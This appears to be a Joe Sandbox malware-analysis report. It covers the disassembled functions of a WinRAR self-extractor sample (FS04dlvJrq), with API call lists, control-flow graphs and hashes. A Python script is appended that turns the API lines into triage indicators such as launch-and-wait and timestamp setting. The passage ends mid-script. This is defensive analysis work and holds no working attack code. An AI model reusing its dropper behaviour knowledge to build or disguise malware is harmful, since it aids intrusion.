                                                                                              • Instruction ID: 987059b7c381b7f71185956b4a9c0db450c4a03afdd8d725bdd3cf172096693b
                                                                                              • Opcode Fuzzy Hash: 51eefe04c4d0c100f0b171c15a2c2b56c8d4a83552d4f3262a91cf226f33a2ab
                                                                                              • Instruction Fuzzy Hash: A8F1A3B1408298DBCF21EFA4CC4ABDE3BA9BF45308F506119F95DBB291DB708649CB51

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00E80678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E80689
                                                                                                • Part of subcall function 00E80678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E8069A
                                                                                                • Part of subcall function 00E80678: IsDialogMessageW.USER32(0001043E,?), ref: 00E806AE
                                                                                                • Part of subcall function 00E80678: TranslateMessage.USER32(?), ref: 00E806BC
                                                                                                • Part of subcall function 00E80678: DispatchMessageW.USER32(?), ref: 00E806C6
                                                                                              • GetDlgItem.USER32(00000068,00000000), ref: 00E83595
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,00E7FD20,00000001,?,?), ref: 00E835BA
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E835C9
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00E9C6C8), ref: 00E835D7
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E835F1
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E8360B
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E8364F
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E83662
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E83675
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E8369C
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00E9C860), ref: 00E836AB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: d4324a173597398750a315aa664ee556b450a116848a76fd232d32f247d058aa
                                                                                              • Instruction ID: a9c0a3bc6b0c5c99671d9b773a11a73cc2fe422fa001720a63695abadabf83d4
                                                                                              • Opcode Fuzzy Hash: d4324a173597398750a315aa664ee556b450a116848a76fd232d32f247d058aa
                                                                                              • Instruction Fuzzy Hash: 3531F47124A700BFE311EF29DC49F6B7BECEF85704F000659FA95B61A1D77099088BA6

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 608 e838a0-e838bc call e857d8 611 e838c2-e838c8 608->611 612 e83bc7-e83bd4 call e61a66 call e85787 608->612 611->612 613 e838ce-e838f4 call e871f0 611->613 620 e838fd-e83909 613->620 621 e838f6 613->621 622 e8390b 620->622 623 e8390d-e83916 620->623 621->620 622->623 624 e83918-e8391b 623->624 625 e83924-e83927 623->625 626 e8391d 624->626 627 e8391f-e83922 624->627 628 e83929 625->628 629 e8392b-e83935 625->629 626->627 627->629 628->629 630 e8393b-e83948 629->630 631 e839ce 629->631 632 e8394a 630->632 633 e8394c-e83956 630->633 634 e839d1-e839d3 631->634 632->633 635 e83958 633->635 636 e8398c-e83999 633->636 637 e839dc-e839de 634->637 638 e839d5-e839da 634->638 641 e8396f-e83972 635->641 639 e8399b 636->639 640 e8399d-e839a7 636->640 642 e839ff-e83a11 call e71383 637->642 643 e839e0-e839e7 637->643 638->637 638->642 639->640 645 e839ad-e839b2 640->645 646 e83bd7-e83bdd 640->646 647 e8395a-e8395f 641->647 648 e83974 641->648 661 e83a29-e83a64 call e614a7 call e6ed0d call e61a66 642->661 662 e83a13-e83a20 call e78da4 642->662 643->642 649 e839e9-e839f5 643->649 655 e839b4 645->655 656 e839b6-e839bc 645->656 652 e83bdf 646->652 653 e83be1-e83be8 646->653 657 e83961 647->657 658 e83963-e8396d 647->658 648->636 650 e839fc 649->650 651 e839f7 649->651 650->642 651->650 652->653 659 e83bea-e83bf0 653->659 660 e83c00-e83c06 653->660 655->656 656->646 663 e839c2-e839c5 656->663 657->658 658->641 664 e83976-e8397b 658->664 667 e83bf2 659->667 668 e83bf4-e83bfd 659->668 670 e83c08 660->670 671 e83c0a-e83c14 660->671 681 e83a9d-e83aac ShellExecuteExW 661->681 682 e83a66-e83a95 call e614a7 call e70e49 call e61a66 661->682 662->661 676 e83a22 662->676 663->630 672 e839cb 663->672 665 e8397d 664->665 666 e8397f-e83989 664->666 665->666 666->636 667->668 668->660 670->671 671->634 672->631 676->661 684 e83b7c-e83b82 681->684 685 e83ab2-e83abc 681->685 716 e83a9a 682->716 717 e83a97 682->717 687 e83b84-e83b99 684->687 688 e83bb7-e83bc3 684->688 689 e83aca-e83acc 685->689 690 e83abe-e83ac0 685->690 692 e83b9b-e83bab call e619a9 687->692 693 e83bae-e83bb6 call e85726 687->693 688->612 695 e83ace-e83ad7 IsWindowVisible 689->695 696 e83ae5-e83af6 WaitForInputIdle call e83fcf 689->696 690->689 694 e83ac2-e83ac8 690->694 692->693 693->688 694->689 701 e83b30-e83b3b CloseHandle 694->701 695->696 702 e83ad9-e83ae3 ShowWindow 695->702 703 e83afb-e83b02 696->703 706 e83b4c-e83b53 701->706 707 e83b3d-e83b4a call e78da4 701->707 702->696 703->701 709 e83b04-e83b06 703->709 712 e83b6b-e83b6d 706->712 713 e83b55-e83b57 706->713 707->706 707->712 709->701 715 e83b08-e83b17 GetExitCodeProcess 709->715 712->684 714 e83b6f-e83b71 712->714 713->712 719 e83b59-e83b5f 713->719 714->684 720 e83b73-e83b76 ShowWindow 714->720 715->701 721 e83b19-e83b22 715->721 716->681 717->716 719->712 722 e83b61 719->722 720->684 723 e83b29 721->723 724 e83b24 721->724 722->712 723->701 724->723
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E838A7
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00E83AA4
                                                                                              • IsWindowVisible.USER32(?), ref: 00E83ACF
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00E83ADD
                                                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 00E83AED
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00E83B0F
                                                                                              • CloseHandle.KERNEL32(?), ref: 00E83B33
                                                                                              • ShowWindow.USER32(?,00000001), ref: 00E83B76
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                                                                              • String ID: .exe$.inf$\
                                                                                              • API String ID: 3208621885-439710875
                                                                                              • Opcode ID: 9c20779fc36d8d7a77c624a7ee7b0520d5e3ec44038f915f2aa3d4f16842a100
                                                                                              • Instruction ID: b00d14d6fb279483d06b0580bbc7f0ff5c27c7e56531c3fa777c35ea66dc43e6
                                                                                              • Opcode Fuzzy Hash: 9c20779fc36d8d7a77c624a7ee7b0520d5e3ec44038f915f2aa3d4f16842a100
                                                                                              • Instruction Fuzzy Hash: EAB1BD71A00248DECF25EF74D9857EE77B5EF84B04F28A11AE84CB7254DB70AE458B50

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1052 e82813-e82845 call e67673 1055 e8284a-e82850 1052->1055 1056 e82847 1052->1056 1057 e82abd 1055->1057 1058 e82856-e8285b 1055->1058 1056->1055 1061 e82abf-e82ac3 1057->1061 1059 e8285d 1058->1059 1060 e82860-e8286e 1058->1060 1059->1060 1062 e82870-e8287c 1060->1062 1063 e82896 1060->1063 1064 e82ace-e82ad2 1061->1064 1065 e82ac5-e82ac8 1061->1065 1062->1063 1069 e8287e 1062->1069 1070 e82899-e8289c 1063->1070 1067 e82af7 1064->1067 1068 e82ad4-e82ad7 1064->1068 1066 e82aca-e82acc 1065->1066 1065->1067 1071 e82ada-e82af2 call e67673 call e838a0 1066->1071 1079 e834ad-e834ed call e658cb 1067->1079 1068->1067 1072 e82ad9 1068->1072 1073 e82884-e82888 1069->1073 1074 e828a2-e828a7 1070->1074 1075 e82ab7 1070->1075 1071->1067 1072->1071 1080 e8288e-e82894 1073->1080 1081 e829f0-e829f2 1073->1081 1076 e828a9 1074->1076 1077 e828ac-e828d7 call e8acee call e61afc 1074->1077 1075->1057 1076->1077 1077->1079 1092 e828dd-e828e1 1077->1092 1100 e834f7-e83500 1079->1100 1101 e834f2 call e857d8 1079->1101 1080->1063 1080->1073 1081->1063 1084 e829f8-e829fc 1081->1084 1084->1070 1094 e828e3 1092->1094 1095 e828e5-e828ec 1092->1095 1094->1095 1096 e828ee 1095->1096 1097 e828f1-e8292f call e6120c call e7645a 1095->1097 1096->1097 1109 e82935-e82937 1097->1109 1103 e83502 1100->1103 1104 e83504-e83514 call e70d1d 1100->1104 1101->1100 1103->1104 1112 e8356a-e8356f call e85787 1104->1112 1113 e83516-e8351c 1104->1113 1110 e8293d-e8299f call e614a7 call e6adaa call e61a66 call e614a7 call e6adaa call e61a66 1109->1110 1111 e82a01-e82a07 1109->1111 1159 e829a1-e829a3 1110->1159 1160 e829a4-e829d2 call e614a7 call e6adaa call e61a66 1110->1160 1118 e82a09-e82a24 1111->1118 1119 e82a4e-e82a68 1111->1119 1115 e8351e 1113->1115 1116 e83520-e83526 1113->1116 1115->1116 1121 e83528-e83531 call e713da 1116->1121 1122 e83533-e83565 call e69733 call e61150 call e625a4 call 
e61a66 * 2 1116->1122 1126 e82a45-e82a4d call e85726 1118->1126 1127 e82a26-e82a3f call e619a9 1118->1127 1124 e82a6a-e82a85 1119->1124 1125 e82aaf-e82ab5 1119->1125 1121->1112 1121->1122 1122->1112 1131 e82aa6-e82aae call e85726 1124->1131 1132 e82a87-e82aa0 call e619a9 1124->1132 1125->1061 1126->1119 1127->1126 1131->1125 1132->1131 1159->1160 1167 e829d4-e829d6 1160->1167 1168 e829d7-e829eb call e7645a 1160->1168 1167->1168 1168->1109
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: HIDE$MAX$MIN
                                                                                              • API String ID: 176396367-2426493550
                                                                                              • Opcode ID: 766fc3d9172fa8bc9235840a4f4dffa9802c3eef007990abbd66f40275269a80
                                                                                              • Instruction ID: 3d716e7d65d7cb30aaf35f1d07e5cd33fbffb64fef459b79e845af4688e4d989
                                                                                              • Opcode Fuzzy Hash: 766fc3d9172fa8bc9235840a4f4dffa9802c3eef007990abbd66f40275269a80
                                                                                              • Instruction Fuzzy Hash: FBB1AE72C00258DACF25EFA4CC85ADDB7B8BF49314F14169EE50DB7281DB709A85CBA1

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 1171 e79556-e79572 call e7a570 1174 e795e4-e795f1 1171->1174 1175 e79574-e79577 1171->1175 1176 e795f4-e795f6 1175->1176 1177 e79579-e79593 1175->1177 1176->1174 1180 e795f8-e7960a call e7906e 1176->1180 1178 e79595-e79597 1177->1178 1179 e7959b-e7959d 1177->1179 1178->1179 1182 e7959f-e795ac call e8d08c 1179->1182 1183 e7960c-e7961a call e7906e 1179->1183 1187 e7961e-e79637 call e8734a 1180->1187 1191 e795ae-e795b9 1182->1191 1192 e795bd-e795e2 call e871f0 1182->1192 1183->1187 1198 e79639-e7963e 1187->1198 1199 e79648-e7964d 1187->1199 1191->1183 1194 e795bb 1191->1194 1192->1174 1192->1175 1194->1182 1200 e79644-e79646 1198->1200 1201 e79640-e79642 1198->1201 1202 e7964f 1199->1202 1203 e7965d-e7965f 1199->1203 1206 e79671-e7967e 1200->1206 1201->1199 1201->1200 1207 e79655-e79657 1202->1207 1208 e79773-e79781 call e7906e 1202->1208 1204 e79665-e7966b 1203->1204 1205 e7975f-e79771 call e7906e 1203->1205 1204->1205 1204->1206 1216 e79785-e79786 call e8734a 1205->1216 1210 e79685-e79690 1206->1210 1211 e79680-e79683 1206->1211 1207->1203 1207->1208 1208->1216 1214 e79696-e7969c 1210->1214 1211->1210 1211->1214 1217 e79755-e7975c 1214->1217 1218 e796a2 1214->1218 1222 e7978b-e79799 call e7906e 1216->1222 1220 e796a4-e796aa 1218->1220 1221 e796b0-e796b2 1218->1221 1220->1217 1220->1221 1223 e796b4-e796b7 1221->1223 1224 e796dc-e796eb call e8d087 1221->1224 1233 e7979d-e797b7 call e8734a call e857a5 1222->1233 1223->1222 1226 e796bd-e796c4 1223->1226 1231 e796f2-e796f3 call e8d08c 1224->1231 1232 e796ed-e796f0 1224->1232 1226->1224 1229 e796c6-e796c8 1226->1229 1229->1224 1234 e796ca 1229->1234 1242 e796f8-e796fd 1231->1242 1235 e796ff-e79701 1232->1235 1257 e797d2-e797d5 1233->1257 1258 e797b9-e797bf call e85ddf 1233->1258 1234->1222 1237 e796d0-e796d6 1234->1237 1239 e79703-e79709 1235->1239 1240 e79721 1235->1240 1237->1222 1237->1224 1243 e7971f 
1239->1243 1244 e7970b-e7971d call e7906e 1239->1244 1245 e79723 1240->1245 1246 e79739 1240->1246 1242->1235 1248 e79740-e79747 1242->1248 1243->1240 1244->1233 1250 e79725-e7972b 1245->1250 1251 e7972d-e79734 call e79556 1245->1251 1246->1248 1248->1217 1253 e79749-e7974f 1248->1253 1250->1246 1250->1251 1251->1246 1253->1217 1259 e79896-e7989b call e85773 1257->1259 1260 e797db-e79810 call e85ddf 1257->1260 1262 e797c4-e797cf call e871f0 1258->1262 1269 e79812-e79828 call e85b4b 1260->1269 1270 e7982d-e79848 call e871f0 1260->1270 1262->1257 1269->1270 1270->1259 1274 e7984a-e7984c 1270->1274 1275 e7984f-e7985b 1274->1275 1276 e7985d-e7986c call e8d08c 1275->1276 1277 e79889-e79894 1275->1277 1279 e79871-e7987a 1276->1279 1277->1259 1277->1275 1280 e79886 1279->1280 1281 e7987c-e79881 call e69384 1279->1281 1280->1277 1281->1280
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Lc$Lc$Lc$Lc
                                                                                              • API String ID: 431132790-651681125
                                                                                              • Opcode ID: 2997a24532bfa4431a6c553f5d9cf17e0bdb2c3f3e70478dd70717d1443c92b5
                                                                                              • Instruction ID: 18bc5809c97d1a4fadaccd1b87b59ff276091d9a16a2db09aada071105a00586
                                                                                              • Opcode Fuzzy Hash: 2997a24532bfa4431a6c553f5d9cf17e0bdb2c3f3e70478dd70717d1443c92b5
                                                                                              • Instruction Fuzzy Hash: D98157719043148FDB28EF64C889B6EB7E5FF81314F14A92EE45DB7183EBB099448792

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 1283 e83efc-e83f11 call e857d8 1286 e83f13 1283->1286 1287 e83f15-e83f45 SetEnvironmentVariableW call e76366 1283->1287 1286->1287 1289 e83f4a-e83f4c 1287->1289 1290 e83f8c-e83f92 1289->1290 1291 e83f4e 1289->1291 1293 e83f94-e83fa9 1290->1293 1294 e83fc7-e83fcc call e85787 1290->1294 1292 e83f51-e83f57 1291->1292 1295 e83f59 1292->1295 1296 e83f5b-e83f67 call e76624 1292->1296 1298 e83fab-e83fbb call e619a9 1293->1298 1299 e83fbe-e83fc6 call e85726 1293->1299 1295->1296 1307 e83f69-e83f70 1296->1307 1308 e83f72-e83f76 1296->1308 1298->1299 1299->1294 1307->1292 1309 e83f78 1308->1309 1310 e83f7a-e83f86 SetEnvironmentVariableW 1308->1310 1309->1310 1310->1290
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E83F03
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00E83F1B
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00E83F86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable$H_prolog3_
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 3605364767-3493335439
                                                                                              • Opcode ID: fcd6ed44cfb69a1d07ca966394a5a14a9a8e57c1117b29df93efb3dd320f3b57
                                                                                              • Instruction ID: a206bc3d351ea017fb5840e043daddfc2d8394f9a43124910992d1982d16ab09
                                                                                              • Opcode Fuzzy Hash: fcd6ed44cfb69a1d07ca966394a5a14a9a8e57c1117b29df93efb3dd320f3b57
                                                                                              • Instruction Fuzzy Hash: 5D212470E012089FCF14EFA8E9859EDB7F9FB48700B50641AF549B7240CB31AA48CBA4

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 1311 e6e180-e6e1c9 1312 e6e1d4 1311->1312 1313 e6e1cb-e6e1ce 1311->1313 1315 e6e1d6-e6e1e6 1312->1315 1313->1312 1314 e6e1d0-e6e1d2 1313->1314 1314->1315 1316 e6e1ee-e6e1f8 1315->1316 1317 e6e1e8 1315->1317 1318 e6e1fd-e6e22a 1316->1318 1319 e6e1fa 1316->1319 1317->1316 1320 e6e232-e6e238 1318->1320 1321 e6e22c 1318->1321 1319->1318 1322 e6e23c-e6e254 CreateFileW 1320->1322 1323 e6e23a 1320->1323 1321->1320 1324 e6e316 1322->1324 1325 e6e25a-e6e28a GetLastError call e7169a 1322->1325 1323->1322 1327 e6e319-e6e31c 1324->1327 1333 e6e2be 1325->1333 1334 e6e28c-e6e293 1325->1334 1329 e6e31e-e6e321 1327->1329 1330 e6e32a-e6e32e 1327->1330 1329->1330 1335 e6e323 1329->1335 1331 e6e330-e6e333 1330->1331 1332 e6e34f-e6e360 1330->1332 1331->1332 1336 e6e335-e6e34c SetFileTime 1331->1336 1338 e6e374-e6e39a call e61a66 call e85734 1332->1338 1339 e6e362-e6e370 call e625c3 1332->1339 1337 e6e2c1-e6e2cb 1333->1337 1340 e6e295 1334->1340 1341 e6e298-e6e2b8 CreateFileW GetLastError 1334->1341 1335->1330 1336->1332 1343 e6e300-e6e314 1337->1343 1344 e6e2cd-e6e2e2 1337->1344 1339->1338 1340->1341 1341->1333 1342 e6e2ba-e6e2bc 1341->1342 1342->1337 1343->1327 1347 e6e2f7-e6e2ff call e85726 1344->1347 1348 e6e2e4-e6e2f4 call e619a9 1344->1348 1347->1343 1348->1347
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,522FB702,?,?,00000000,?,?,00000000,00E99E6B,000000FF), ref: 00E6E248
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00E99E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00E6E25A
                                                                                              • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,00E99E6B,000000FF,?,00000011), ref: 00E6E2A6
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00E99E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00E6E2AF
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00E99E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 00E6E346
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 7fa82eb677e5c31eee28d33f3b8fc2268684caf1b572e14d9ce0bec0f3f24d60
                                                                                              • Instruction ID: 83d9b0611eb4e9ac7e9ecc77f73a102437d1c1890a1870bc905f0c6bb07d2920
                                                                                              • Opcode Fuzzy Hash: 7fa82eb677e5c31eee28d33f3b8fc2268684caf1b572e14d9ce0bec0f3f24d60
                                                                                              • Instruction Fuzzy Hash: DF61BB74840249DFDB24CFA4E885BEE7BE5FB08358F20162AF819A73D0D774A944CB94
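Added example (not part of the Joe Sandbox report and not Joe Sandbox code): a small Python parser that reads the "APIs" bullet lines shown for three of the functions above (the ShellExecuteExW runner with its IsWindowVisible/ShowWindow/WaitForInputIdle/GetExitCodeProcess sequence, the SetEnvironmentVariableW(sfxcmd)/SetEnvironmentVariableW(sfxpar) routine, and the CreateFileW/SetFileTime routine) and turns them into indicators a triage analyst can assert on instead of eyeballing the listing. The Win32 constants used to decode arguments (OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, the 0x7D0 = 2000 ms WaitForInputIdle timeout) are standard values, not read from the report. The sfxcmd/sfxpar names are the environment variables the WinRAR SFX module sets for the program it launches, which is why their presence identifies the first stage as a WinRAR self-extractor; the indicator labels themselves are my own. The sample lines embedded in the script are copied from this page and labelled as constructed input.

```python
"""Parse Joe Sandbox "APIs" bullet lines into structured calls and flag
behaviour patterns. Added example for this report, not Joe Sandbox code.
Win32 constants below are standard values (not taken from the report)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# "• Api.MODULE(arg,arg), ref: ADDR" or "• Api.MODULE ref: ADDR";
# subcall lines carry a "Part of subcall function XXXX:" prefix.
API_RE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS"}
SFX_ENV_VARS = ("sfxcmd", "sfxpar")   # set by the WinRAR SFX module for its child


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]     # raw strings; "?" where the sandbox could not resolve a value
    ref: int            # call-site address

    def arg_int(self, i: int) -> Optional[int]:
        """Argument i as an integer (the report prints hex), or None if unresolved."""
        if i >= len(self.args):
            return None
        try:
            return int(self.args[i], 16)
        except ValueError:          # "?" or a string literal such as sfxcmd
            return None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Keep only lines in the API bullet format; section headers are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            calls.append(ApiCall(m.group("api"), m.group("module"),
                                 args.split(",") if args is not None else [],
                                 int(m.group("ref"), 16)))
    return calls


def describe_create_file(call: ApiCall) -> str:
    """Decode dwCreationDisposition (arg 4) and dwFlagsAndAttributes (arg 5)."""
    disp = call.arg_int(4)
    flags = call.arg_int(5) or 0
    names = [n for bit, n in FILE_FLAGS.items() if flags & bit]
    return (f"disposition={CREATION_DISPOSITION.get(disp, disp)} "
            f"flags={'|'.join(names) if names else hex(flags)}")


def find_indicators(calls: List[ApiCall]) -> List[str]:
    """Behaviour indicators for one function's API list, in a fixed order."""
    found = []
    names = [c.api for c in calls]
    # 1. WinRAR SFX: the module exports its command line through sfxcmd/sfxpar
    #    before running the Setup= program.
    sfx = sorted({c.args[0] for c in calls
                  if c.api == "SetEnvironmentVariableW" and c.args and c.args[0] in SFX_ENV_VARS})
    if sfx:
        found.append("winrar-sfx-env:" + ",".join(sfx))
    # 2. Launch-and-wait: ShellExecuteExW, then WaitForInputIdle and
    #    GetExitCodeProcess on the child. The timeout argument is in milliseconds.
    if "ShellExecuteExW" in names:
        after = names[names.index("ShellExecuteExW"):]
        if "WaitForInputIdle" in after and "GetExitCodeProcess" in after:
            wait = next(c for c in calls if c.api == "WaitForInputIdle")
            found.append(f"launch-and-wait:timeout_ms={wait.arg_int(1)}")
    # 3. Open a file, then SetFileTime: archive extractors restore stored
    #    timestamps this way, but so does timestomping, so decode how it opened.
    create = [c for c in calls if c.api == "CreateFileW"]
    if create and "SetFileTime" in names:
        found.append("open-then-setfiletime:" + describe_create_file(create[0]))
    return found


# Constructed sample: API bullet lines copied from three functions in this report.
SAMPLE = """\
• __EH_prolog3_GS.LIBCMT ref: 00E838A7
• ShellExecuteExW.SHELL32(?), ref: 00E83AA4
• IsWindowVisible.USER32(?), ref: 00E83ACF
• ShowWindow.USER32(?,00000000), ref: 00E83ADD
• WaitForInputIdle.USER32(?,000007D0), ref: 00E83AED
• GetExitCodeProcess.KERNEL32(?,?), ref: 00E83B0F
• CloseHandle.KERNEL32(?), ref: 00E83B33
• ShowWindow.USER32(?,00000001), ref: 00E83B76
• SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00E83F1B
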